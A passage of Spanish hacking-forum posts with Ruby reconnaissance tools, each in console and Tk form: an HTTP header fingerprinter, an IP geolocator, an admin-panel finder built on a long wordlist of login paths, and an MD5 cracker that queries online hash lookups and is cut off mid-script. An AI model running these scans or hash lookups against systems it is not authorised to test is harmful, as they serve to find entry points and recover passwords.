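      # finish call was skipped whenever head raised.
      Net::HTTP.start(page) do |nave|
        nave.head("/").each do |name,value|
          # Header text is chosen by the remote server. Drop control
          # characters so it cannot send escape sequences to the terminal.
          limpio = value.to_s.b.gsub(/[\x00-\x1f\x7f]/n, "")
          respuesta = respuesta + "[+] "+name+" : "+limpio+"\n"
        end
      end
    rescue
      respuesta = "Error"
    end
    return respuesta
  end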
  23.  
  # Print the command-line usage line.
  def uso
    $stdout.print "\n[+] Sintax : ruby httpfinger.rb <target>\n"
  end
  27.  
  # Print the program banner.
  def head
    $stdout.print "\n-- == HTTP FingerPrinting 0.2 == --\n\n"
  end
  31.  
  # Print the closing copyright line.
  def copyright
    $stdout.print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  end
  35.  
  36. #
  37.  
  # Entry point: the first command-line argument is the host to query.
  target = ARGV[0]

  head()

  if target
    print "\n[+] Searching ...\n\n"
    print httpfinger(target)
    print "\n[+] Finished\n"
  else
    # No host given: show the usage line instead.
    uso()
  end

  copyright()
  51.  
  52. #The End ?
  53.  

Version Tk :

Código
  1. #!usr/bin/ruby
  2. #HTTP FingerPrinting 0.2
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "tk"
  6. require "net/http"
  7.  
  8. # Functions
  9.  
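  # Send a HEAD request for "/" to a host and list the response headers.
  #
  # page - host name or address, without scheme or path.
  #
  # Returns one "[+] name : value" line per header, or the string "Error"
  # when the request fails for any reason.
  def httpfinger(page)
    respuesta = ""
    begin
      # The block form closes the connection on every path; the explicit
      # finish call was skipped whenever head raised.
      Net::HTTP.start(page) do |nave|
        nave.head("/").each do |name,value|
          respuesta = respuesta + "[+] "+name+" : "+value+"\n"
        end
      end
    rescue
      respuesta = "Error"
    end
    return respuesta
  end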
  24.  
  25. #
  26.  
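  # Build the window: a target entry, a console text area and a Search button.
  window = TkRoot.new { title "HTTP FingerPrinting 0.2 Coded By Doddy H" ; background "black" }
  window['geometry'] = '300x300-20+10'

  TkLabel.new(window) do
    background "black"
    foreground "cyan"
    text "    Target : "
    place('relx'=>"0.1",'rely'=>"0.1")
  end

  target = TkEntry.new(window){
    background "black"
    foreground "cyan"
    width 25
    place('relx'=>0.3,'rely'=>0.1)
  }

  TkLabel.new(window) do
    background "black"
    foreground "cyan"
    text "Console"
    place('relx'=>0.4,'rely'=>0.2)
  end

  console =TkText.new(window) do
    background "black"
    foreground "cyan"
    width 30
    height 10
    place('relx'=>0.1,'rely'=>0.3)
  end

  TkButton.new(window) do
    text "Search"
    background "black"
    foreground "cyan"
    width 17
    activebackground "cyan"
    highlightbackground  "cyan"
    command proc{
      # Read the entry into its own local. Assigning the string back to
      # `target` replaced the TkEntry widget, so a second click failed
      # when it called value on a String.
      host = target.value.to_s
      console.insert("end","[+] Searching ...\n\n")
      console.insert("end",httpfinger(host))
      console.insert("end","\n[+] Finished")
    }
    place('relx'=>0.3,'rely'=>0.9)
  end

  Tk.mainloop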
  76.  
  77. #The End ?
  78.  

Una imagen :



Eso es todo.
3  Programación / Scripting / [Ruby] LocateIP 0.3 en: 27 Junio 2015, 01:18
Un simple script en Ruby para localizar una IP y sus DNS.

Version consola :

Código
  1. #!usr/bin/ruby
  2. #LocateIP 0.3
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "open-uri"
  6. require "net/http"  
  7. require "resolv"
  8.  
  9. # Functions
  10.  
  # Resolve a host name to an address.
  #
  # Returns the address string, or the string "Error" when resolution fails.
  def get_ip(hostname)
    Resolv.getaddress(hostname)
  rescue
    "Error"
  end
  18.  
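  # Fetch a URL with a browser-like User-Agent and return the body.
  #
  # web - absolute URL string.
  #
  # Returns the response body, or the string "Error" on any failure.
  #
  # The URL is parsed before it is opened. Kernel#open treats a leading "|"
  # as a command to run and other non-URL text as a local path, so such an
  # argument no longer reaches it and yields "Error" instead. Opening
  # through the parsed URI is also the form current open-uri supports.
  def toma(web)
    begin
      destino = URI.parse(web)
      return destino.open("User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
    rescue
      return "Error"
    end
  end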
  26.  
  # Return the HTTP status code of a GET request as a string.
  #
  # Any failure, including an unparsable URL, is reported as "404".
  def response_code(web)
    respuesta = Net::HTTP.get_response(URI(web))
    respuesta.code
  rescue
    "404"
  end
  34.  
  # POST a form body to a URL and return the response body.
  #
  # web - absolute URL string; its host, port and path are used.
  # arg - already-encoded form body.
  #
  # Returns the response body, or the string "Error" on any failure.
  # NOTE(review): the connection is created without TLS settings, so the
  # request appears to go out as plain HTTP whatever the scheme - confirm.
  def tomar(web,arg)
    agente = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
    destino = URI(web)
    Net::HTTP.new(destino.host, destino.port).post(destino.path,arg, agente).body
  rescue
    "Error"
  end
  45.  
  # Print the command-line usage line.
  def uso
    $stdout.print "\n[+] Sintax : ruby locateip.rb <target>\n"
  end
  49.  
  # Print the program banner.
  def head
    $stdout.print "\n\n-- == LocateIP 0.3 == --\n\n"
  end
  53.  
  # Print the closing copyright line.
  def copyright
    $stdout.print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
  end
  57.  
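  # Resolve a host, then print its geolocation fields and reverse-IP names.
  #
  # target - host name or IP address given on the command line.
  #
  # The resolved address is sent to two third-party lookup pages over
  # http:// URLs and their HTML is scraped with regular expressions, so a
  # field prints "Not Found" whenever a request fails or the markup differs.
  def locateip(target)

    print "\n[+] Getting IP ...\n"

    ip = get_ip(target)

    print "\n[+] IP : "+ip+"\n"

    # get_ip reports failure as the string "Error". Stop here instead of
    # submitting that literal to the lookup pages as if it were an address.
    return if ip == "Error"

    web = "http://www.melissadata.com/lookups/iplocation.asp"
    print "\n[+] Locating ...\n\n"

    code = tomar(web,"ipaddress="+ip+"&btn=Submit")

    # One table row per field. Using the same label for both branches also
    # corrects the "State of Region" wording in the not-found message.
    ["City", "Country", "State or Region"].each do |campo|
      if code =~ /#{Regexp.escape(campo)}<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
        print "[+] "+campo+" : "+$2+"\n"
      else
        print "[+] "+campo+" : Not Found\n"
      end
    end

    print "\n[+] Getting DNS ...\n\n"

    code = toma("http://www.ip-adress.com/reverse_ip/"+ip)

    dnss = code.scan(/whois\/(.*?)\">Whois/).flatten.reject { |dns| dns == "" }

    # Each name goes on its own line; without the newline the results ran
    # together on a single line.
    dnss.each do |dns|
      print "[+] DNS Found : "+dns+"\n"
    end

    if dnss.empty?
      print "\n[-] DNS Not Found\n"
    end
  end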
  110.  
  target = ARGV[0]

  head()

  # Without an argument only the usage line is shown.
  target ? locateip(target) : uso()

  copyright()
  122.  
  123. #The End ?
  124.  

Version Tk :

Código
  1. #!usr/bin/ruby
  2. #LocateIP 0.3
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "tk"
  6. require "open-uri"
  7. require "net/http"
  8. require "resolv"
  9.  
  10. # Functions
  11.  
  # Resolve +hostname+ to an address string with Resolv.
  # Returns the literal string "Error" when the lookup raises, so callers
  # must compare against that sentinel before using the result.
  def get_ip(hostname)
    Resolv.getaddress(hostname)
  rescue
    "Error"
  end
  19.  
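  # Fetch +web+ with an HTTP GET and return the response body as a String.
  #
  # The URL is parsed first and opened through the URI object instead of
  # Kernel#open: Kernel#open treats a string that starts with "|" as a
  # command to run, and Ruby 3.0 and later no longer open URLs through it.
  # Any failure (malformed URL, unsupported scheme, network error) yields the
  # literal string "Error", as before.
  def toma(web)
    agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
    URI.parse(web).open("User-Agent" => agent).read
  rescue
    "Error"
  end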
  27.  
  # Issue a GET for +web+ and return the HTTP status code as a String.
  # Every exception is reported as "404", so a caller cannot tell a real
  # 404 from a malformed URL or a connection failure.
  def response_code(web)
    target = URI(web)
    reply = Net::HTTP.get_response(target)
    reply.code
  rescue
    "404"
  end
  35.  
  # POST the form-encoded string +arg+ to +web+ and return the response body.
  # The connection is built from host and port only and TLS is never
  # enabled, so the request body is sent in clear text.
  # Any exception yields the literal string "Error".
  def tomar(web,arg)
    target = URI(web)
    request_headers = {
      "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
    }
    Net::HTTP.new(target.host, target.port).post(target.path, arg, request_headers).body
  rescue
    "Error"
  end
  46.  
  47. #
  48.  
  # Main window: 300x300, black background.
  window = TkRoot.new { title "LocateIP 0.3 (C) Doddy Hackman 2015" ; background "black" }
  window['geometry'] = '300x300-20+10'

  # Caption for the target entry.
  TkLabel.new(window) do
    background "black"
    foreground "yellow"
    text "    Target : "
    place('relx'=>"0.1",'rely'=>"0.1")
  end

  # Entry holding the host name; the Search handler reads it through the
  # `target` local.
  target = TkEntry.new(window){
    background "black"
    foreground "yellow"
    width 25
    place('relx'=>0.3,'rely'=>0.1)
  }

  # Caption for the output area.
  TkLabel.new(window) do
    background "black"
    foreground "yellow"
    text "Console"
    place('relx'=>0.4,'rely'=>0.2)
  end

  # Text widget that receives every status and result line.
  console =TkText.new(window) do
    background "black"
    foreground "yellow"
    width 30
    height 10
    place('relx'=>0.1,'rely'=>0.3)
  end
  80.  
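  TkButton.new(window) do
    text "Search"
    background "black"
    foreground "yellow"
    width 17
    activebackground "yellow"
    highlightbackground  "yellow"
    # Click handler: resolve the entered host, then show geolocation fields
    # and reverse-IP names in the console widget. Both lookups go to
    # third-party sites over plain HTTP.
    command proc{

      # Keep the entry text in its own local. Assigning it back to `target`
      # would replace the TkEntry captured by this closure with a String,
      # and the next click would fail on String#value.
      hostname = target.value.to_s

      console.insert("end",  "[+] Getting IP ...\n")

      ip = get_ip(hostname)

      web = "http://www.melissadata.com/lookups/iplocation.asp"

      console.insert("end", "\n[+] Locating ...\n\n")

      code = tomar(web,"ipaddress="+ip+"&btn=Submit")

      # Each field is read from the second capture group of its table row.
      if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
        console.insert("end", "[+] City : "+$2+"\n")
      else
        console.insert("end", "[+] City : Not Found\n")
      end

      if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
        console.insert("end","[+] Country : "+$2+"\n")
      else
        console.insert("end", "[+] Country : Not Found\n")
      end

      if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
        console.insert("end", "[+] State or Region : "+$2+"\n")
      else
        console.insert("end","[+] State or Region : Not Found\n")
      end

      console.insert("end","\n[+] Getting DNS ...\n\n")

      control = "0"

      code = toma("http://www.ip-adress.com/reverse_ip/"+ip)

      dnss = code.scan(/whois\/(.*?)\">Whois/)

      dnss.flatten.each do |dns|
        if dns != ""
          control = "1"
          # One name per line; previously the entries ran together.
          console.insert("end", "[+] DNS Found : "+dns+"\n")
        end
      end

      if control=="0"
        console.insert("end","\n[-] DNS Not Found\n")
      end

      console.insert("end","\n\n[+] Finished")

    }
    place('relx'=>0.3,'rely'=>0.9)
  end

  Tk.mainloop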
  148.  
  149. #The End ?
  150.  

Una imagen :



Eso es todo.
4  Programación / Scripting / [Ruby] PanelFinder 0.5 en: 12 Junio 2015, 23:52
Un script sencillo en Ruby para buscar el panel de administración de una página probando una lista fija de rutas conocidas.

Version consola :

Código
  1. #!usr/bin/ruby
  2. #PanelFinder 0.5
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "open-uri"
  6. require "net/http"  
  7.  
  8. # Functions
  9.  
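  # Fetch +web+ with an HTTP GET and return the response body as a String.
  #
  # The URL is parsed first and opened through the URI object instead of
  # Kernel#open: Kernel#open treats a string that starts with "|" as a
  # command to run, and Ruby 3.0 and later no longer open URLs through it.
  # Any failure (malformed URL, unsupported scheme, network error) yields the
  # literal string "Error", as before.
  def toma(web)
    agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
    URI.parse(web).open("User-Agent" => agent).read
  rescue
    "Error"
  end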
  17.  
  # Issue a GET for +web+ and return the HTTP status code as a String.
  # No headers are passed, so the request carries Net::HTTP's default
  # User-Agent rather than the browser string used by the other helpers.
  # Every exception is reported as "404".
  def response_code(web)
    target = URI(web)
    reply = Net::HTTP.get_response(target)
    reply.code
  rescue
    "404"
  end
  25.  
  # POST the form-encoded string +arg+ to +web+ and return the response body.
  # The connection is built from host and port only and TLS is never
  # enabled, so the request body is sent in clear text.
  # Any exception yields the literal string "Error".
  def tomar(web,arg)
    target = URI(web)
    request_headers = {
      "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
    }
    Net::HTTP.new(target.host, target.port).post(target.path, arg, request_headers).body
  rescue
    "Error"
  end
  36.  
  # Request every path of a fixed list under +page+ and print the URLs that
  # answer with status "200".
  #
  # What this looks like from the server side: one client requesting the
  # listed administrative paths back to back, with no delay between
  # requests, using the User-Agent that response_code sends. That burst is
  # a usable signal for access-log alerting and rate limiting.
  #
  # Result caveats: response_code maps every failure to "404", and a site
  # that answers 200 for unknown paths makes every entry look like a hit.
  def find_panel(page)
    panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlp
anel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/
','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
    print "\n[+] Scanning ...\n\n"
    hits = 0
    panels.each do |panel|
      url = page+"/"+panel
      next unless response_code(url)=="200"
      print "[+] Link : "+url+"\n"
      hits += 1
    end
    print(hits > 0 ? "\n[+] Finished\n" : "\n[-] Not Found\n")
  end
  57.  
  # Print the command-line usage line.
  def uso
    $stdout.print("\n[+] Sintax : ruby panel_finder.rb <page>\n")
  end
  61.  
  # Print the program banner.
  def head
    $stdout.print("\n\n-- ==  Panel Finder 0.5 == --\n\n")
  end
  65.  
  # Print the closing copyright line.
  def copyright
    $stdout.print("\n\n-- == (C) Doddy Hackman 2015 == --\n\n")
  end
  69.  
  page = ARGV[0]

  head()

  # Without an argument only the usage line is shown.
  page ? find_panel(page) : uso()

  copyright()
  81.  
  82. #The End ?
  83.  

Version Tk :

Código
  1. #!usr/bin/ruby
  2. #PanelFinder 0.5
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "tk"
  6. require "open-uri"
  7. require "net/http"
  8.  
  9. # Functions
  10.  
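  # Fetch +web+ with an HTTP GET and return the response body as a String.
  #
  # The URL is parsed first and opened through the URI object instead of
  # Kernel#open: Kernel#open treats a string that starts with "|" as a
  # command to run, and Ruby 3.0 and later no longer open URLs through it.
  # Any failure (malformed URL, unsupported scheme, network error) yields the
  # literal string "Error", as before.
  def toma(web)
    agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
    URI.parse(web).open("User-Agent" => agent).read
  rescue
    "Error"
  end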
  18.  
  # Issue a GET for +web+ and return the HTTP status code as a String.
  # No headers are passed, so the request carries Net::HTTP's default
  # User-Agent rather than the browser string used by the other helpers.
  # Every exception is reported as "404".
  def response_code(web)
    target = URI(web)
    reply = Net::HTTP.get_response(target)
    reply.code
  rescue
    "404"
  end
  26.  
  # POST the form-encoded string +arg+ to +web+ and return the response body.
  # The connection is built from host and port only and TLS is never
  # enabled, so the request body is sent in clear text.
  # Any exception yields the literal string "Error".
  def tomar(web,arg)
    target = URI(web)
    request_headers = {
      "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
    }
    Net::HTTP.new(target.host, target.port).post(target.path, arg, request_headers).body
  rescue
    "Error"
  end
  37.  
  38. #
  39.  
  # Main window: 300x300, black background.
  window = TkRoot.new { title "PanelFinder 0.5 (C) Doddy Hackman 2015" ; background "black" }
  window['geometry'] = '300x300-20+10'

  # Caption for the page entry.
  TkLabel.new(window) do
    background "black"
    foreground "orange"
    text "     Page : "
    place('relx'=>"0.1",'rely'=>"0.1")
  end

  # Entry holding the base URL; the Search handler reads it through the
  # `page` local.
  page = TkEntry.new(window){
    background "black"
    foreground "orange"
    width 25
    place('relx'=>0.3,'rely'=>0.1)
  }

  # Caption for the output area.
  TkLabel.new(window) do
    background "black"
    foreground "orange"
    text "Console"
    place('relx'=>0.4,'rely'=>0.2)
  end

  # Text widget that receives every status and result line.
  console =TkText.new(window) do
    background "black"
    foreground "orange"
    width 30
    height 10
    place('relx'=>0.1,'rely'=>0.3)
  end
  71.  
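  TkButton.new(window) do
    text "Search"
    background "black"
    foreground "orange"
    width 17
    activebackground "orange"
    highlightbackground  "orange"
    # Click handler: request every path of the fixed list under the entered
    # base URL and show the ones answering "200". On the server side this is
    # a burst of back-to-back requests for administrative paths from one
    # client, which access-log alerting and rate limiting can pick up.
    command proc{

      # Keep the entry text in its own local. Assigning it back to `page`
      # would replace the TkEntry captured by this closure with a String,
      # and the next click would fail on String#value.
      site = page.value.to_s
      panels = ['admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlp
anel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/
','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
      console.insert("end", "[+] Scanning ...\n\n")
      control = "0"
      panels.each do |panel|
        url = site+"/"+panel
        status_code = response_code(url)
        if status_code=="200"
          console.insert("end","[+] Link : "+url+"\n")
          control = "1"
        end
      end
      if control=="1"
        console.insert("end","\n[+] Finished")
      else
        console.insert("end","\n[-] Not Found")
      end

    }
    place('relx'=>0.3,'rely'=>0.9)
  end

  Tk.mainloop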
  106.  
  107. #The End ?
  108.  

Una imagen :



Eso es todo.
5  Programación / Scripting / [Ruby] MD5 Cracker 0.2 en: 29 Mayo 2015, 16:37
Un simple script en Ruby para crackear un hash MD5 consultando tres servicios online; el hash se envía a esos servicios por HTTP sin cifrar.

Version consola :

Código
  1. #!usr/bin/ruby
  2. #MD5 Cracker 0.2
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "open-uri"
  6. require "net/http"  
  7.  
  8. # Functions
  9.  
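  # Fetch +web+ with an HTTP GET and return the response body as a String.
  #
  # The URL is parsed first and opened through the URI object instead of
  # Kernel#open: Kernel#open treats a string that starts with "|" as a
  # command to run, and Ruby 3.0 and later no longer open URLs through it.
  # Any failure (malformed URL, unsupported scheme, network error) yields the
  # literal string "Error", as before.
  def toma(web)
    agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
    URI.parse(web).open("User-Agent" => agent).read
  rescue
    "Error"
  end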
  17.  
  # Issue a GET for +web+ and return the HTTP status code as a String.
  # Every exception is reported as "404", so a caller cannot tell a real
  # 404 from a malformed URL or a connection failure.
  def response_code(web)
    target = URI(web)
    reply = Net::HTTP.get_response(target)
    reply.code
  rescue
    "404"
  end
  25.  
  # POST the form-encoded string +arg+ to +web+ and return the response body.
  # The connection is built from host and port only and TLS is never
  # enabled, so the request body (here, the hash being looked up) is sent
  # in clear text. Any exception yields the literal string "Error".
  def tomar(web,arg)
    target = URI(web)
    request_headers = {
      "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
    }
    Net::HTTP.new(target.host, target.port).post(target.path, arg, request_headers).body
  rescue
    "Error"
  end
  36.  
  # Look +md5+ up on three online services and print what each one returns.
  #
  # No hashing or guessing happens locally: the hash is posted to each
  # third-party site over plain HTTP, so the site operators and anyone on
  # the network path learn it. A hit means the plaintext is already in a
  # service's table. The value is concatenated into the form body without
  # encoding or format checks.
  def crack(md5)
    print "\n[+] Cracking ...\n\n"

    # url, form body, pattern whose first group is the plaintext,
    # hit prefix, miss line
    services = [
      ["http://md5online.net/index.php",
       "pass="+md5+"&option=hash2text&send=Submit",
       /pass : <b>(.*?)<\/b>/,
       "[+] md5online.net -> ",
       "[-] md5online.net -> Not Found"],
      ["http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php",
       "md5="+md5,
       /<span class='middle_title'>Hashed string<\/span>: (.*?)<\/div>/,
       "[+] md5.my-addr.co -> ",
       "[-] md5.my-addr.co -> Not Found"],
      ["http://md5decryption.com/index.php",
       "hash="+md5+"&submit=Decrypt It!",
       /Decrypted Text: <\/b>(.*?)<\/font>/,
       "[+] md5decryption.com -> ",
       "[-] md5decryption.com -> Not Found"]
    ]

    services.each do |url, form, pattern, hit_prefix, miss_line|
      code = tomar(url, form)
      if code =~ pattern
        print hit_prefix+$1+"\n"
      else
        print miss_line+"\n"
      end
    end

    print "\n[+] Finished"
  end
  71.  
  # Print the command-line usage line.
  def uso
    $stdout.print("\n[+] Sintax : ruby md5cracker.rb <md5>\n")
  end
  75.  
  # Print the program banner.
  def head
    $stdout.print("\n\n-- == MD5 Cracker 0.2 == --\n\n")
  end
  79.  
  # Print the closing copyright line.
  def copyright
    $stdout.print("\n\n-- == (C) Doddy Hackman 2015 == --\n\n")
  end
  83.  
  84. #
  85.  
  md5 = ARGV[0]

  head()

  # Without an argument only the usage line is shown.
  md5 ? crack(md5) : uso()

  copyright()
  97.  
  98. #The End ?
  99.  

Version Tk :

Código
  1. #!usr/bin/ruby
  2. #MD5 Cracker 0.2
  3. #(C) Doddy Hackman 2015
  4.  
  5. require "tk"
  6. require "open-uri"
  7. require "net/http"
  8.  
  9. #Functions
  10.  
  11. # Functions
  12.  
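  # Fetch +web+ with an HTTP GET and return the response body as a String.
  #
  # The URL is parsed first and opened through the URI object instead of
  # Kernel#open: Kernel#open treats a string that starts with "|" as a
  # command to run, and Ruby 3.0 and later no longer open URLs through it.
  # Any failure (malformed URL, unsupported scheme, network error) yields the
  # literal string "Error", as before.
  def toma(web)
    agent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
    URI.parse(web).open("User-Agent" => agent).read
  rescue
    "Error"
  end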
  20.  
  # Issue a GET for +web+ and return the HTTP status code as a String.
  # Every exception is reported as "404", so a caller cannot tell a real
  # 404 from a malformed URL or a connection failure.
  def response_code(web)
    target = URI(web)
    reply = Net::HTTP.get_response(target)
    reply.code
  rescue
    "404"
  end
  28.  
  # POST the form-encoded string +arg+ to +web+ and return the response body.
  # The connection is built from host and port only and TLS is never
  # enabled, so the request body (here, the hash being looked up) is sent
  # in clear text. Any exception yields the literal string "Error".
  def tomar(web,arg)
    target = URI(web)
    request_headers = {
      "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"
    }
    Net::HTTP.new(target.host, target.port).post(target.path, arg, request_headers).body
  rescue
    "Error"
  end
  39.  
  40. #
  41.  
  # Main window: 300x300, black background.
  window = TkRoot.new { title "MD5 Cracker 0.2 (C) Doddy Hackman 2015" ; background "black" }
